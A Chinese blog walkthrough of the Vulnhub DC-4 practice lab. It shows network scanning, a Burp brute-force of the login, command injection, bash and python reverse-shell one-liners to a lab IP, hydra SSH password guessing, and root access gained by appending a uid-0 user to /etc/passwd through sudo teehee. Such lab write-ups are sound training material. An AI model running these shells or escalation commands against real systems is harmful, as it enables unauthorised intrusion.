靶场DC-4

最新推荐文章于 2024-03-30 19:49:57 发布
最新推荐文章于 2024-03-30 19:49:57 发布
阅读量690 收藏
点赞数 1
分类专栏: 网络安全 靶场 文章标签: 网络安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JJ951001/article/details/128088382
版权

本篇靶场练习实际发生于今年5月,但由于个人原因,一直没发,留个记录吧

每个靶场其实都多多少少能学到新东西,但时间久了,不用可能会忘记,因此写下来以作为记录。实际渗透环境复杂得多,所以靶场其实是一个练兵场。举一反三才重要!

针对DC系列的靶场,其实最终目标都是获取root下的flag,来吧,继续整吧。

开整

网络发现

前三个靶场我都用的arp-scan命令,来发现同网络主机,那其实还可以用nmap或者netdiscover来扫,这里就用netdiscover

sudo netdiscover -i eth0 
# 或
sudo netdiscover -r 192.168.32.0/24

# -i 指定网卡
# -r 指定扫描范围
# 采用第一种会扫描很多段,建议使用第二种指定范围的

netdiscover
扫完之后可能不会回到shell,需要ctrl+c,然后去掉网关地址,锁定目标192.168.32.130,开枪。

端口扫描

nmap -sS -T4 -A -p- 192.168.32.130

端口扫描

端口信息:

  • 80----ngnix1.15.10
  • 22----openssh7.4

nice,有80端口,就好这口。

WEB入侵

既然有80段口,话不多说,我来瞅瞅这是么子鬼:
web
咦~一脸嫌弃,这是什么呀,只有个登录,不是某个CMS了,也没有任何提示了,也是,打了好几个靶场了,还需要啥提示。既然只有登录功能(只针对该靶场),那么可能想到的方法有以下几种:

  • 暴力破解
  • SQL注入

尝试SQL注入万能密码,账号admin’ or ‘1’='1,密码任意,看是否能成功,这里当登录失败时不会有任何提示,故不考虑了,直接暴破吧。BP截包:
在这里插入图片描述

右键send intruder,设置好后,开始暴破,需要注意的是,新版本bp设置线程是在Resource Pool设置:

开始暴破,这里用户字段选择/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt,密码选择/usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-1000.txt,100那个试过了,不行,所以换了密码字典。还有一个小坑,如果暴破过程中有成功的,后续也都会显示登录成功:
在这里插入图片描述

获得账号密码:admin/happy,拿来吧你,登录后发现命令执行功能点:
在这里插入图片描述

点进去后,发现默认三个选项:

  • List Files == ls -l,列文件
  • Disk Usage == du -h,展示磁盘使用量的统计信息,侧重在文件夹和文件的磁盘占用方面
  • Disk Free == df -h,侧重在文件系统级别的磁盘占用方面

而且还有回显:
在这里插入图片描述

继续BP截包,尝试修改默认的ls -lwhoami:
在这里插入图片描述

可发现执行成功,且当前用户为www-data,再执行下id,查看以下uid为33,是一个普通用户:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-omzHYdRm-1669644202942)(./assert/id.png)]

继续看下有哪些命令ls /usr/bin
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-J4xeNPPF-1669644202943)(./assert/bin.png)]

好办了,尝试bash反弹shell,失败:

bash -i >& /dev/tcp/192.168.32.128/7777 0>&1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-prrM2LHB-1669644202943)(./assert/bash.png)]

那尝试python反弹shell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.128",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

提权

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-D5dffR2d-1669644202944)(./assert/python.png)]

反弹shell后,尝试提权,老样子suid、sudo、内核这些都信息搜集一波,看下哪个可以用:
在这里插入图片描述

  • 内核debian 4.9.30
  • sudo不行,放弃
  • suid,有个/home/jim/test.sh,或许可以

先看内核searchexploit debian 4.9.30
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cAsYcYeR-1669644202945)(./assert/debian.png)]

无果,放弃。。。
suid,那个/home/jim/test.sh呢
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hDHJGEuU-1669644202946)(./assert/test.png)]

啥?一句话就把我打发了?
就准备放弃的时候,发现/home/jim下有个backups,看看备份了些啥?
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MQMpJyAH-1669644202947)(./assert/backup.png)]

哟~小样,原来放了个存密码的文件,让我想起了某攻防演练,云文档、运维机桌面上的密码文件。。。
哈,回想开了22端口,查看下存在那些用户cat /etc/passwd
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xlVm3M5V-1669644202947)(./assert/passwd.png)]

可见存在以下几个用户:

  • root
  • jim
  • sam
  • charles

保存到user.txt里边,然后把old-passwords.bak保存到pass.txt里边,然后使用hydra对目标机的ssh开始暴破:

hydra -L user.txt -P pass.txt 192.168.32.130 ssh

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rw5LR19y-1669644202948)(./assert/hydra.png)]

发现账号密码:jim/jibril04,直接ssh上去
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4kHhShmx-1669644202949)(./assert/ssh.png)]

先去jim的家目录看看,查看以下mbox文件,发现只是一个test:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0HSpRDjL-1669644202950)(./assert/justtest.png)]

本以为真的没有路了,但我突然发现我登录时有一个提示"you have mail",说我有邮件,直接执行mail命令看看:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SWpwfboe-1669644202950)(./assert/mail.png)]

发现charles的密码^xHhA&hvim0y,直接切换他用户su charles,然后执行sudo -l,发现teehee可以root权限执行,则可用来提权,teehee --help查看下:
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VcbVd7Cf-1669644202951)(./assert/teehee.png)]

发下-a可以追加内容,那简单了,直接写一个uid=0的用户到passwd文件里即可提权成功:

echo "hack::0:0:::/bin/bash" | teehee -a /etc/passwd
su hack

发下-a可以追加内容,那简单了,直接写一个uid=0的用户到passwd文件里即可提权成功:

echo "hack::0:0:::/bin/bash" | teehee -a /etc/passwd
su hack

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-moysmD3K-1669644202952)(./assert/结束.png)]

写在最后:

2022,这一年,我颓废了,膨胀了,忘记了初心,然而时间却已悄然逝去,头发亦然,本以为我会比去年更有激情,更有活力,可还是选择了舒适,选择了安逸,选择了躺平。也思考了有一段时间了,所以决定再出发。

r3h4ck
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶场 DC系列 DC-4靶场
sdfsergfr的博客
12-10 303
Vulnhub靶场 CD系列 CD-4靶场 ,黑盒实验,反弹shell网站,利用22端口ssh服务,kali密码爆破,得到admin用户的密码happy,登录admin用户 bp对radio位置的发送,得到密码字典 old-passwords.bak。添加反弹shell,得到密码字典 old-passwords.bak。九头蛇hydra:利用密码字典发现ssh的账号:jim密码: jibril04 。finalshell ssh连接 对文件查找 得到用户:Charles 密码:^xHhA&hvim0y。
vulnhub DC4 靶场练习
鸥鹭忘机
08-16 590
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第四台,下载地址为https://www.vulnhub.com/entry/dc-4,313/。该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-4靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。 然后需要溢出CD/DVD选项,这个启动时候会自动检测并连接
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-06 1005
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-4 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
DC4靶场
m0_62438849的博客
03-09 858
例如,网站可能是由静态文件组成,不需要后端数据库或复杂的CMS来管理内容。每个有效负载集都可以使用各种有效负载类型,并可以以不同的方式自定义每种负载类型。Payload type(负载类型):较为常用的有Simple list(简单列表)、Runtime file(运行文件)等。所谓“无法登录”,指的是仅是这个用户无法使用bash或者其他shell来登录系统而已,并不是说这个账号就无法使用系统资源。系统账号的shell使用/sbin/nologin,此时无法登录系统,即时给了密码也不行。
DC-4靶场搭建及渗透实战详细过程(DC靶场系列)
金 帛的博客
07-28 4215
dc-4靶场详细渗透过程
linux window文件格式转linux文件格式
loyaltylzr的专栏
12-28 1365
(1)使用linux命令dos2unix filename,直接把文件转换为unix格式; (2)使用sed命令sed -i "s/\r//" filename 或者 sed -i "s/^M//" filename直接替换结尾符为unix格式; (3)vi filename打开文件,执行 : set ff=unix 设置文件为unix,然后执行:wq,保存成unix格式。 查看脚本文件是dos...
DC4靶场通关详细记录】
博客
12-17 1026
DC4靶场通关记录】-----扫描器AWVS的使用;命令执行漏洞的利用;hydra爆破ssh的密码;teehee提权方法
【记一次DC4靶场夺旗过程】
qq_55213436的博客
07-04 1526
目录前言 夺旗过程总结 最近也是学了一些提权方面的知识,所以找个靶场来练练手。以下针对vulnerable发布的dc4靶场来进行一个简单的渗透测试。
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
vuInhub靶场实战系列-DC-4实战
05-22
vuInhub靶场实战系列-DC-4实战
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
DC-4靶场实战
qq_42754807的博客
03-30 743
DC-4靶场实战
内网渗透DC-4靶场通关
qq_35664104的博客
09-25 596
个人博客:点我 DC系列共9个靶场,本次来试玩一下DC-4,只有一个flag,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP DC-4: 192.168.31.176 Kali: 192.168.31.17 Win7: 192.168.31.168 信息搜集 首先是主机发现,得到靶机ip arp-scan -l 对其进行端口扫描,开放了80、22、4444
dc-4 靶机渗透学习
..
03-19 2967
信息收集 第一步还是老办法,探测主机存活。 nmap -sP 192.168.202.0/24 通过推断得出192.168.202.142是靶机,具体请看dc-2、dc-3,对靶机进行端口扫描。 nmap -A -p- -v 192.168.202.142 发现22、80端口开启,访问一下80端口,发现是个登录页面。 用Wappalyzer识别框架,没试别出,查看源代码发现只是一个简单的登录界面 这种情况感觉没必要再用nikto扫描了,尝试用bp爆...
Vulnhub-DC-4 靶场渗透练习
weixin_52451257的博客
01-27 2961
靶场地址: DC: 4 ~ VulnHub 第一步:信息收集 nmap -sn -T4 192.168.231.0/24 nmap -A -p- 192.168.231.152 正在上传…重新上传取消 dirb http://192.168.231.152 nikto -h http://192.168.231.152 python3 dirmap.py -i http://192.168.231.152 -lcf ls python3 dirsearch -u htt..
vulnhub靶机之DC-4
m0_52328368的博客
08-19 1127
vulnhub之dc-4详细步骤
DC靶场1-6
qq_42133828的博客
09-16 2808
靶机下载: https://download.vulnhub.com/dc/ 环境配置: 在VM以net连接打开虚拟机 使用的机器: 攻击机:kali linux 靶机:DC1,2,4,5,6(IP随配) DC1 1.nmap扫描端口 nmap -sS -A 192.168.119.135 2. 访问页面,收集信息 http://192.168.119.135:80 ...
靶机实操:vulnhub-DC4
不想当脚本小子的脚本小子
12-07 177
照例先信息收集:IP:192.168.249.137 开放了22ssh端口以及80端口,web服务器的nginx1.15.10,主界面是一个登录框(能否sql注入?能否暴力破解?)。 看看 ngnix有没有什么漏洞,发现没有: 扫后台也没得到什么有效的信息: 看看网页源码有没有什么提示,还是没有什么有价值的,那就只能直接爆破了,这里我使用burpsuite来抓包爆破 这里我使用的是john里面的字典,因为我觉得一个靶机可能,不值得一个几十个G的密码字典来爆: 最后登录成
SQL注入靶场sqli-labs
12-20
4. 配置数据库:sqli-labs使用MySQL数据库作为后端数据库。您需要创建一个新的数据库,并将数据库的连接信息配置到sqli-labs项目的配置文件中。 5. 导入数据库表结构:在MySQL数据库中,导入sqli-labs项目提供的SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值